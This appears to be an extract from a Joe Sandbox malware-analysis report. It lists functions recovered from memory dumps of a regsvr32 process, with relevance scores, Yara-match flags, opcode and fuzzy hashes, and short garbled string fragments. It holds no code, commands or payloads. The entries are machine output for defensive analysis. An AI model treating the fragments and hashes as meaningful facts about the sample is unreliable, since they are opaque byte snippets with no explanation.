                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5CF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$ $UCV$y4.)
                                                                                                • API String ID: 0-917551206
                                                                                                • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                • Instruction ID: 872ac113d227417d04799d037f8cc11bbf31f681ad0819693572863b5a0ed8b7
                                                                                                • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                • Instruction Fuzzy Hash: 9512F4B1A0470C9FDB58DFA8E48A5DDBBF2FB48344F00412DEA06A7290D7B5D809CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F44EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$rq%$tL>$".
                                                                                                • API String ID: 0-3922733902
                                                                                                • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                • Instruction ID: d648eeba22ba1ab54aed37f6df740c64d02b316e4aacc8c18ed39c91bce3a77d
                                                                                                • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                • Instruction Fuzzy Hash: 9222CF719096C88BDBF8DF24C8896DD3BF0FF48344F90125A984E9A654DBB86685CF42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5AD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g$-$HE$Vc
                                                                                                • API String ID: 0-2562162751
                                                                                                • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                • Instruction ID: 6eb9b33485735fd4eb67e85d0be6016d93240fcb8198620c8bcbbd2fde0902f6
                                                                                                • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                • Instruction Fuzzy Hash: 20A1D2B150478C9FDB88CF28D88A4CD3BB2FB58398F505219FC4A97261D7B8D985CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F480CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (;$*i$he$*%
                                                                                                • API String ID: 0-35414758
                                                                                                • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                • Instruction ID: bd265002b46beaa8128f5f4240ecb68c92e0a5162275ec1513b5c33df22afa00
                                                                                                • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                • Instruction Fuzzy Hash: F4712970514348DBDF48CF28C88A5DD3FA1FB483A8F565319FC4AA6290DBB8D585CB89
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4D474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: */$I$Yu$(
                                                                                                • API String ID: 0-674225443
                                                                                                • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                • Instruction ID: c28a514060f593819038a6f380180110df0816bbc7457fb963fb64a0199adc99
                                                                                                • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                • Instruction Fuzzy Hash: D9718EB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F414D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$.:$PYq|$W
                                                                                                • API String ID: 0-626586655
                                                                                                • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                • Instruction ID: b64432de2b0a98487406e4d2048c8c44ee14136cd69523497c0bc0416b529641
                                                                                                • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                • Instruction Fuzzy Hash: 6441E17061CB858FD7A8DF28D58A65BBBF0FBD9705F804A1EE589C7250DB7898048B42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F54A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: -+$0u$S$e!
                                                                                                • API String ID: 0-4217091389
                                                                                                • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                • Instruction ID: 308d2ebbf358dff60eaf5c05706032850e5b3425897abc53caf6f9f346d62b5a
                                                                                                • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                • Instruction Fuzzy Hash: 7A41E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4A660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5`$<ml$a:$P
                                                                                                • API String ID: 0-330785107
                                                                                                • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                • Instruction ID: d24221991b31f6b125181c859fd5896da40861c8ee6a71be6b4ee6fe43fe7d91
                                                                                                • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                • Instruction Fuzzy Hash: 3B41F4B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F43274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: o$"B$SJ$wU
                                                                                                • API String ID: 0-691100934
                                                                                                • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                • Instruction ID: 006021ae329b3a256c2410e8d066089e1313800e0b0e42ecd3622287e596a2ba
                                                                                                • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                • Instruction Fuzzy Hash: 8741F0B180078ECFDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F41B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 9luJ$=2y}$=2y}$b
                                                                                                • API String ID: 0-1667874806
                                                                                                • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                • Instruction ID: 1165cd44a661f2b4ec7e1b42544717f640abcd24ce815d7290e59c07b1103299
                                                                                                • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                • Instruction Fuzzy Hash: 0D41D6B181038EDFDF44CF64D88A5CE7BB0FB18358F110A19F865A62A4D3B89665CF85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F448FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ;$O,$fdu
                                                                                                • API String ID: 0-1721916326
                                                                                                • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                • Instruction ID: 57afa4c380e8c3a26427a0ae8fcb1f57192822feb832532db503ac905ccc49d0
                                                                                                • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                • Instruction Fuzzy Hash: 47A10471D14718EBDF58DFA8E8C999EBBB1FB54314F00421EE806A72A0DB78A945CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F43E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: u$&v$f
                                                                                                • API String ID: 0-1868853588
                                                                                                • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                • Instruction ID: fe77f84747c33807b41806afc6eab367ed355a751109a84d4e2cc1dac5c04018
                                                                                                • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                • Instruction Fuzzy Hash: 6E713571D05709ABCF1CDFA8E5D959DBBB1FB44314F10412DE816A72A0CB749949CF81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5E750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: o$j$t
                                                                                                • API String ID: 0-2067604139
                                                                                                • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                • Instruction ID: 02904e4e4b592e00dafa42f3240f11c7651cf150e50dbf439b6c842c2e82822b
                                                                                                • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                • Instruction Fuzzy Hash: 1361DF715087848BD368DF28C58A55FBBF1FBC6704F104A1DEA8A8B2A0D77AD944CB43
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5D5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: P$KGRa$wy
                                                                                                • API String ID: 0-4077564265
                                                                                                • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                • Instruction ID: c99701341e17573ad34a729d7029183474b1e52342fdf71ec0fba763f2cffb39
                                                                                                • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                • Instruction Fuzzy Hash: D141C0B090074A8BDF48CF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F58BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: =$N@`Y$`Y
                                                                                                • API String ID: 0-2183226064
                                                                                                • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                • Instruction ID: 88aa028624a77ccff17d55a808ead3e1b3191fce306ebdf9413f09b5ab130a43
                                                                                                • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                • Instruction Fuzzy Hash: 6751D3B190074E8FDB44CF68C88A4DE7FB0FB68398F214619F856A6250D3B496A4CFD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5EAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: '0$~?$\
                                                                                                • API String ID: 0-629757258
                                                                                                • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                • Instruction ID: ccaacbbd56ea3e24ccba9396cb4e86ca34055d9872c5eca266498e8667c49e11
                                                                                                • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                • Instruction Fuzzy Hash: 4441CEB0548B808BE718CF28C59A51ABFF1FBC5344F604A2DF6968A3A0D774D885CF42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4DCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: A7$z$~*b
                                                                                                • API String ID: 0-275545515
                                                                                                • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                • Instruction ID: ed44d28217e0c51f72d994e92b4b2e1dd7627d83053ddd59b9a25ed04ad6ae9d
                                                                                                • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                • Instruction Fuzzy Hash: D441C3B180074E8FDB48CF64C48A5DE7FB0FB64398F204619E855A6250D3B896A9CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4A7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: H$rTk=${,%
                                                                                                • API String ID: 0-3174111592
                                                                                                • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                • Instruction ID: 5a2ccc3bd27e50c741ae996dff360d9d4949c27aa58e4e13ce357da09f6f725e
                                                                                                • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                • Instruction Fuzzy Hash: CE31E770528785ABD798DF28C4D991EBBE1FBD4354F906A1CF982862A0C779D845CB03
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                • String ID:
                                                                                                • API String ID: 15204871-0
                                                                                                • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: LinkObjectOpenSymbolic
                                                                                                • String ID:
                                                                                                • API String ID: 3706036087-0
                                                                                                • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F53FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: D?"$8zfK
                                                                                                • API String ID: 0-617590365
                                                                                                • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                • Instruction ID: 0828ddf6b19d4d27afa1993f1b78bb5a566ec31cc196b06964c6eea417654841
                                                                                                • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                • Instruction Fuzzy Hash: 251203B550560DCBDB68DF38C48A49E3BE0FF58318F201129FC269B2A2D774E964CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F4C078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$h}
                                                                                                • API String ID: 0-3021649463
                                                                                                • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                • Instruction ID: 4062777863ed1dc5cf98f67c037af6867d18faafb82c54528816cdf64779fb1b
                                                                                                • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                • Instruction Fuzzy Hash: D12296719096888BEBF8DF24C885AD97BF0FF44704F90251ED84E9A650DB7C6645CF82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F69910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$+ <
                                                                                                • API String ID: 0-1007305072
                                                                                                • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                • Instruction ID: 25ba42df14fa006f30dfffd7b90842f080a5ae0f9499597df69724c53146689e
                                                                                                • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                • Instruction Fuzzy Hash: E10278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00F5B460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Hc$aYG
                                                                                                • API String ID: 0-2147329803
                                                                                                • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                • Instruction ID: edd0ea705c0ce2af50f5d0439a5e19cedcc12a74e96cf567f7cc8e2d07e92899
                                                                                                • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                • Instruction Fuzzy Hash: 1ED1207560170DCBDB68CF28C58A59E3BE8FF54308F504129FC1E862A5D7B8E829CB46
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

